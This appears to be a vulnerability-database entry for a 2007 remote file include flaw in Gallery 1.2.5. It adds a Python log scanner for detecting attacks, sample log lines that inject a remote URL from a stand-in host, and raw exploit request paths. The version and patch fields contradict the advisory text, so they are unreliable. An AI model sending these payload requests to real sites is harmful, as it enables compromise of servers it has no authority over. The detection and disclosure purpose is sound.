Vendor: Gallery
By: milw0rm.com
CVSS: 7.5 (HIGH)
CWE: Remote File Include
Product Name: Gallery
Affected Version From: 1.2.2005
Affected Version To: 1.2.2005
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Gallery 1.2.5 <= Remote File Include Vulnerabilities

The vulnerability allows remote attackers to include arbitrary files by supplying a specially crafted URL in the GALLERY_BASEDIR parameter of the needinit.php, reconfigure.php, unconfigured.php, and configmode.php scripts in the errors/ directory.

Mitigation:

Upgrade to a patched version of Gallery.
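
Detection: the following added example (not part of the original advisory) scans web access-log lines for requests to the four listed scripts that carry a GALLERY_BASEDIR query parameter, and separates values that are URLs from other client-supplied values. The combined-style log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# The four scripts and the parameter name come from the advisory text.
SCRIPT_RE = re.compile(
    r"/errors/(needinit|reconfigure|unconfigured|configmode)\.php(?:/|$)", re.I)
PARAM = "GALLERY_BASEDIR"
# Assumption: Apache/nginx "combined" style request field.
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# A value that starts with scheme:// (http, https, ftp, ...) points off-host.
URL_RE = re.compile(r"^\s*[a-z][a-z0-9+.-]+://", re.I)

def classify(line):
    """Return None, 'param-set' or 'remote-include' for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not SCRIPT_RE.search(unquote(url.path)):
        return None
    # parse_qsl percent-decodes once, so encoded values are compared decoded.
    values = [v for k, v in parse_qsl(url.query, keep_blank_values=True)
              if k == PARAM]
    if not values:
        return None
    if any(URL_RE.match(v) for v in values):
        return "remote-include"
    return "param-set"  # client-supplied base directory: still worth review

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict))
    return hits

# Constructed sample log lines (documentation addresses and hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Apr/2007:10:00:00 +0000] "GET /gallery/errors/needinit.php?GALLERY_BASEDIR=http://evil.example/x.txt%3F HTTP/1.1" 200 512',
    '192.0.2.10 - - [15/Apr/2007:10:00:02 +0000] "GET /gallery/errors/configmode.php?GALLERY_BASEDIR=hTTp%3A%2F%2Fevil.example%2Fx HTTP/1.1" 200 512',
    '192.0.2.11 - - [15/Apr/2007:10:01:00 +0000] "GET /gallery/errors/unconfigured.php?GALLERY_BASEDIR=../ HTTP/1.1" 200 90',
    '192.0.2.12 - - [15/Apr/2007:10:02:00 +0000] "GET /gallery/errors/needinit.php HTTP/1.1" 200 300',
    '192.0.2.13 - - [15/Apr/2007:10:03:00 +0000] "GET /gallery/albums.php?GALLERY_BASEDIR=http://evil.example/ HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    for lineno, verdict in scan(SAMPLE_LOG):
        print(lineno, verdict)
```

The scan only sees values passed in the query string; it is scoped to the four scripts named above, so the last sample line is not flagged.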

Exploit-DB raw data:

# Gallery 1.2.5 <= Remote File Include Vulnerabilities
# D.Script: http://www.gnu-darwin.org/packages/x86/www/gallery-1.2.5.tgz
# Exploit:[Path]/errors/needinit.php?GALLERY_BASEDIR=Shell
# Exploit:[Path]/errors/reconfigure.php?GALLERY_BASEDIR=Shell
# Exploit:[Path]/errors/unconfigured.php?GALLERY_BASEDIR=Shell
# Exploit:[Path]/errors/configmode.php?GALLERY_BASEDIR=Shell

# milw0rm.com [2007-04-15]